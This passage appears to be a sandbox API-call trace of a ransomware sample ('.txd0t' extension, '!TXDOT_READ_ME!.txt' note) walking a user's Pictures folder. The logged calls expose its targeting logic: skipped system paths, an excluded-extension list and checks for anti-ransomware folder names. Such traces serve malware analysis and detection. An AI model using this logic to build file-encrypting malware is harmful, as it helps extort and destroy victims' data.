(psz1="JNDCEREvKtt-06-A0UX8.png", psz2="bootfont.bin") returned 1 [0075.889] StrCmpIW (psz1="JNDCEREvKtt-06-A0UX8.png", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.889] PathFindExtensionW (pszPath="JNDCEREvKtt-06-A0UX8.png") returned=".png" [0075.889] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".png") returned 0x0 [0075.889] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0075.889] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0075.889] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0075.991] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.991] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png" [0075.991] SetEvent (hEvent=0x408) returned 1 [0075.991] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf84b3990, ftCreationTime.dwHighDateTime=0x1d5e44a, ftLastAccessTime.dwLowDateTime=0xdc0b5c90, ftLastAccessTime.dwHighDateTime=0x1d5edc5, ftLastWriteTime.dwLowDateTime=0xdc0b5c90, ftLastWriteTime.dwHighDateTime=0x1d5edc5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="kG7T_G4j-", cAlternateFileName="KG7T_G~1")) returned 1 [0075.991] StrCmpW (psz1="kG7T_G4j-", psz2=".") returned 1 [0075.991] StrCmpW (psz1="kG7T_G4j-", psz2="..") returned 1 [0075.991] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0075.991] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0075.991] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="kG7T_G4j-", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0075.991] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\windows\\system32\\") returned 0x0 [0075.991] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\windows\\syswow64\\") returned 0x0 [0075.991] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\windows\\system\\") returned 0x0 [0075.991] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\windows\\winsxs\\") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\appdata\\roaming\\") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\appdata\\local\\") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\appdata\\locallow\\") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\all users\\microsoft\\") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\inetpub\\logs\\") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\boot\\") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\perflogs\\") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\programdata\\") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\drivers\\") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\wsus\\") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\efstmpwp\\") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\$recycle.bin\\") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="crypt_detect") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="cryptolocker") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="ransomware") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="C:\\WINDOWS") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="C:\\Program Files (x86)") returned 0x0 [0075.992] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="C:\\Program Files") returned 0x0 [0075.992] GetProcessHeap () returned 0xe30000 [0075.992] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c6) returned 0xed31f0 [0075.992] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0075.992] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\*", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\*") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\*" [0075.992] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf84b3990, ftCreationTime.dwHighDateTime=0x1d5e44a, ftLastAccessTime.dwLowDateTime=0xdc0b5c90, ftLastAccessTime.dwHighDateTime=0x1d5edc5, ftLastWriteTime.dwLowDateTime=0xdc0b5c90, ftLastWriteTime.dwHighDateTime=0x1d5edc5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec25f0 [0075.992] StrCmpW (psz1=".", psz2=".") returned 0 [0075.992] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf84b3990, ftCreationTime.dwHighDateTime=0x1d5e44a, ftLastAccessTime.dwLowDateTime=0xdc0b5c90, ftLastAccessTime.dwHighDateTime=0x1d5edc5, ftLastWriteTime.dwLowDateTime=0xdc0b5c90, ftLastWriteTime.dwHighDateTime=0x1d5edc5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.993] StrCmpW (psz1="..", psz2=".") returned 1 [0075.993] StrCmpW (psz1="..", psz2="..") returned 0 [0075.993] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41835e50, ftCreationTime.dwHighDateTime=0x1d5e0f7, ftLastAccessTime.dwLowDateTime=0x8ec64f00, ftLastAccessTime.dwHighDateTime=0x1d5ee90, ftLastWriteTime.dwLowDateTime=0x8ec64f00, ftLastWriteTime.dwHighDateTime=0x1d5ee90, nFileSizeHigh=0x0, nFileSizeLow=0x1579e, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="-aUMUjkCqPRwR9Vt.gif", cAlternateFileName="-AUMUJ~1.GIF")) returned 1 [0075.993] StrCmpW (psz1="-aUMUjkCqPRwR9Vt.gif", psz2=".") returned 1 [0075.993] StrCmpW (psz1="-aUMUjkCqPRwR9Vt.gif", psz2="..") returned 1 [0075.993] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0075.993] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0075.993] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="-aUMUjkCqPRwR9Vt.gif", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif" [0075.993] PathFindExtensionW (pszPath="-aUMUjkCqPRwR9Vt.gif") returned=".gif" [0075.993] StrCmpW (psz1=".gif", psz2=".txd0t") returned -1 [0075.993] StrCmpIW (psz1="-aUMUjkCqPRwR9Vt.gif", psz2="bootsect.bak") returned -1 [0075.993] StrCmpIW (psz1="-aUMUjkCqPRwR9Vt.gif", psz2="iconcache.db") returned -1 [0075.993] StrCmpIW (psz1="-aUMUjkCqPRwR9Vt.gif", psz2="thumbs.db") returned -1 [0075.993] StrCmpIW (psz1="-aUMUjkCqPRwR9Vt.gif", psz2=" ransomware ") returned 1 [0075.993] StrCmpIW (psz1="-aUMUjkCqPRwR9Vt.gif", psz2=" ransom ") returned 1 [0075.993] StrCmpIW (psz1="-aUMUjkCqPRwR9Vt.gif", psz2="debug.txt") returned -1 [0075.993] StrCmpIW (psz1="-aUMUjkCqPRwR9Vt.gif", psz2="boot.ini") returned -1 [0075.993] StrCmpIW (psz1="-aUMUjkCqPRwR9Vt.gif", psz2="desktop.ini") returned -1 [0075.993] StrCmpIW (psz1="-aUMUjkCqPRwR9Vt.gif", psz2="autorun.inf") returned -1 [0075.993] StrCmpIW (psz1="-aUMUjkCqPRwR9Vt.gif", psz2="ntuser.dat") returned -1 [0075.993] StrCmpIW (psz1="-aUMUjkCqPRwR9Vt.gif", psz2="ntldr") returned -1 [0075.993] StrCmpIW (psz1="-aUMUjkCqPRwR9Vt.gif", psz2="ntdetect.com") returned -1 [0075.993] StrCmpIW (psz1="-aUMUjkCqPRwR9Vt.gif", psz2="bootfont.bin") returned -1 [0075.993] StrCmpIW (psz1="-aUMUjkCqPRwR9Vt.gif", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.993] PathFindExtensionW (pszPath="-aUMUjkCqPRwR9Vt.gif") returned=".gif" [0075.993] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".gif") returned 0x0 [0075.993] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0075.993] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0075.993] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0076.112] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.112] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif" [0076.113] SetEvent (hEvent=0x418) returned 1 [0076.113] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc6d5fd0, ftCreationTime.dwHighDateTime=0x1d5edd1, ftLastAccessTime.dwLowDateTime=0xb43a1e40, ftLastAccessTime.dwHighDateTime=0x1d5e226, ftLastWriteTime.dwLowDateTime=0xb43a1e40, ftLastWriteTime.dwHighDateTime=0x1d5e226, nFileSizeHigh=0x0, nFileSizeLow=0xceb1, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="0 jXVleh5y.bmp", cAlternateFileName="0JXVLE~1.BMP")) returned 1 [0076.113] StrCmpW (psz1="0 jXVleh5y.bmp", psz2=".") returned 1 [0076.113] StrCmpW (psz1="0 jXVleh5y.bmp", psz2="..") returned 1 [0076.113] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0076.113] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0076.113] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="0 jXVleh5y.bmp", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp" [0076.113] PathFindExtensionW (pszPath="0 jXVleh5y.bmp") returned=".bmp" [0076.113] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0076.113] StrCmpIW (psz1="0 jXVleh5y.bmp", psz2="bootsect.bak") returned -1 [0076.113] StrCmpIW (psz1="0 jXVleh5y.bmp", psz2="iconcache.db") returned -1 [0076.113] StrCmpIW (psz1="0 jXVleh5y.bmp", psz2="thumbs.db") returned -1 [0076.113] StrCmpIW (psz1="0 jXVleh5y.bmp", psz2=" ransomware ") returned 1 [0076.113] StrCmpIW (psz1="0 jXVleh5y.bmp", psz2=" ransom ") returned 1 [0076.113] StrCmpIW (psz1="0 jXVleh5y.bmp", psz2="debug.txt") returned -1 [0076.113] StrCmpIW (psz1="0 jXVleh5y.bmp", psz2="boot.ini") returned -1 [0076.113] StrCmpIW (psz1="0 jXVleh5y.bmp", psz2="desktop.ini") returned -1 [0076.113] StrCmpIW (psz1="0 jXVleh5y.bmp", psz2="autorun.inf") returned -1 [0076.113] StrCmpIW (psz1="0 jXVleh5y.bmp", psz2="ntuser.dat") returned -1 [0076.113] StrCmpIW (psz1="0 jXVleh5y.bmp", psz2="ntldr") returned -1 [0076.113] StrCmpIW (psz1="0 jXVleh5y.bmp", psz2="ntdetect.com") returned -1 [0076.113] StrCmpIW (psz1="0 jXVleh5y.bmp", psz2="bootfont.bin") returned -1 [0076.113] StrCmpIW (psz1="0 jXVleh5y.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.113] PathFindExtensionW (pszPath="0 jXVleh5y.bmp") returned=".bmp" [0076.113] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0076.113] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0076.113] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0076.113] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0076.123] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.123] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp" [0076.123] SetEvent (hEvent=0x410) returned 1 [0076.123] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8322180, ftCreationTime.dwHighDateTime=0x1d5e70a, ftLastAccessTime.dwLowDateTime=0x179c8e20, ftLastAccessTime.dwHighDateTime=0x1d5e509, ftLastWriteTime.dwLowDateTime=0x179c8e20, ftLastWriteTime.dwHighDateTime=0x1d5e509, nFileSizeHigh=0x0, nFileSizeLow=0xde5c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="3w6B72hITb.png", cAlternateFileName="3W6B72~1.PNG")) returned 1 [0076.123] StrCmpW (psz1="3w6B72hITb.png", psz2=".") returned 1 [0076.123] StrCmpW (psz1="3w6B72hITb.png", psz2="..") returned 1 [0076.123] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0076.123] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0076.123] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="3w6B72hITb.png", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png" [0076.123] PathFindExtensionW (pszPath="3w6B72hITb.png") returned=".png" [0076.123] StrCmpW (psz1=".png", psz2=".txd0t") returned -1 [0076.123] StrCmpIW (psz1="3w6B72hITb.png", psz2="bootsect.bak") returned -1 [0076.123] StrCmpIW (psz1="3w6B72hITb.png", psz2="iconcache.db") returned -1 [0076.123] StrCmpIW (psz1="3w6B72hITb.png", psz2="thumbs.db") returned -1 [0076.123] StrCmpIW (psz1="3w6B72hITb.png", psz2=" ransomware ") returned 1 [0076.123] StrCmpIW (psz1="3w6B72hITb.png", psz2=" ransom ") returned 1 [0076.123] StrCmpIW (psz1="3w6B72hITb.png", psz2="debug.txt") returned -1 [0076.123] StrCmpIW (psz1="3w6B72hITb.png", psz2="boot.ini") returned -1 [0076.123] StrCmpIW (psz1="3w6B72hITb.png", psz2="desktop.ini") returned -1 [0076.123] StrCmpIW (psz1="3w6B72hITb.png", psz2="autorun.inf") returned -1 [0076.123] StrCmpIW (psz1="3w6B72hITb.png", psz2="ntuser.dat") returned -1 [0076.123] StrCmpIW (psz1="3w6B72hITb.png", psz2="ntldr") returned -1 [0076.123] StrCmpIW (psz1="3w6B72hITb.png", psz2="ntdetect.com") returned -1 [0076.123] StrCmpIW (psz1="3w6B72hITb.png", psz2="bootfont.bin") returned -1 [0076.123] StrCmpIW (psz1="3w6B72hITb.png", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.123] PathFindExtensionW (pszPath="3w6B72hITb.png") returned=".png" [0076.123] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".png") returned 0x0 [0076.123] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0076.123] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0076.124] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0076.130] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.131] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png" [0076.131] SetEvent (hEvent=0x408) returned 1 [0076.131] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84cc6c70, ftCreationTime.dwHighDateTime=0x1d5f005, ftLastAccessTime.dwLowDateTime=0x9fe13da0, ftLastAccessTime.dwHighDateTime=0x1d5ec82, ftLastWriteTime.dwLowDateTime=0x9fe13da0, ftLastWriteTime.dwHighDateTime=0x1d5ec82, nFileSizeHigh=0x0, nFileSizeLow=0x13118, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Bn2jVBj5I1Q6.png", cAlternateFileName="BN2JVB~1.PNG")) returned 1 [0076.131] StrCmpW (psz1="Bn2jVBj5I1Q6.png", psz2=".") returned 1 [0076.131] StrCmpW (psz1="Bn2jVBj5I1Q6.png", psz2="..") returned 1 [0076.131] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0076.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0076.131] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="Bn2jVBj5I1Q6.png", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png" [0076.131] PathFindExtensionW (pszPath="Bn2jVBj5I1Q6.png") returned=".png" [0076.131] StrCmpW (psz1=".png", psz2=".txd0t") returned -1 [0076.131] StrCmpIW (psz1="Bn2jVBj5I1Q6.png", psz2="bootsect.bak") returned -1 [0076.131] StrCmpIW (psz1="Bn2jVBj5I1Q6.png", psz2="iconcache.db") returned -1 [0076.131] StrCmpIW (psz1="Bn2jVBj5I1Q6.png", psz2="thumbs.db") returned -1 [0076.131] StrCmpIW (psz1="Bn2jVBj5I1Q6.png", psz2=" ransomware ") returned 1 [0076.131] StrCmpIW (psz1="Bn2jVBj5I1Q6.png", psz2=" ransom ") returned 1 [0076.131] StrCmpIW (psz1="Bn2jVBj5I1Q6.png", psz2="debug.txt") returned -1 [0076.131] StrCmpIW (psz1="Bn2jVBj5I1Q6.png", psz2="boot.ini") returned -1 [0076.131] StrCmpIW (psz1="Bn2jVBj5I1Q6.png", psz2="desktop.ini") returned -1 [0076.131] StrCmpIW (psz1="Bn2jVBj5I1Q6.png", psz2="autorun.inf") returned 1 [0076.131] StrCmpIW (psz1="Bn2jVBj5I1Q6.png", psz2="ntuser.dat") returned -1 [0076.131] StrCmpIW (psz1="Bn2jVBj5I1Q6.png", psz2="ntldr") returned -1 [0076.131] StrCmpIW (psz1="Bn2jVBj5I1Q6.png", psz2="ntdetect.com") returned -1 [0076.131] StrCmpIW (psz1="Bn2jVBj5I1Q6.png", psz2="bootfont.bin") returned -1 [0076.131] StrCmpIW (psz1="Bn2jVBj5I1Q6.png", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.131] PathFindExtensionW (pszPath="Bn2jVBj5I1Q6.png") returned=".png" [0076.131] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".png") returned 0x0 [0076.131] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0076.131] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0076.131] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0076.150] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.150] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png" [0076.150] SetEvent (hEvent=0x408) returned 1 [0076.150] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a8373f0, ftCreationTime.dwHighDateTime=0x1d5e96e, ftLastAccessTime.dwLowDateTime=0x951ba230, ftLastAccessTime.dwHighDateTime=0x1d5ee9d, ftLastWriteTime.dwLowDateTime=0x951ba230, ftLastWriteTime.dwHighDateTime=0x1d5ee9d, nFileSizeHigh=0x0, nFileSizeLow=0x1809f, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="bwUCcMWGBF1Mcn_.gif", cAlternateFileName="BWUCCM~1.GIF")) returned 1 [0076.150] StrCmpW (psz1="bwUCcMWGBF1Mcn_.gif", psz2=".") returned 1 [0076.150] StrCmpW (psz1="bwUCcMWGBF1Mcn_.gif", psz2="..") returned 1 [0076.150] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0076.150] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") 